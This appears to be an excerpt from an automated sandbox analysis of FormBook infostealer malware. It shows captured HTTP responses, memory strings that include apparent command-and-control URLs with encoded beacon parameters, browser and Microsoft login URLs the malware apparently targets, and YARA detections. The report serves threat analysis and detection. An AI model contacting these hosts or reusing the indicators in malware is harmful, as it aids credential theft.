        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 03:57:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 30 Oct 2024 03:59:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000058EA000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.000000000335A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://patioprojex.africa/iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG
        Source: hEtOKWgxZfeL.exe, 00000007.00000002.4487012045.0000000004F46000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanxuanz.tech
        Source: hEtOKWgxZfeL.exe, 00000007.00000002.4487012045.0000000004F46000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanxuanz.tech/1q08/
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000055C6000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: rasdial.exe, 00000005.00000003.2604993632.000000000799F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000060C4000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003B34000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: rasdial.exe, 00000005.00000002.4486451389.00000000063E8000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.galaxyslot88rtp.lat/sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9k
        Source: rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
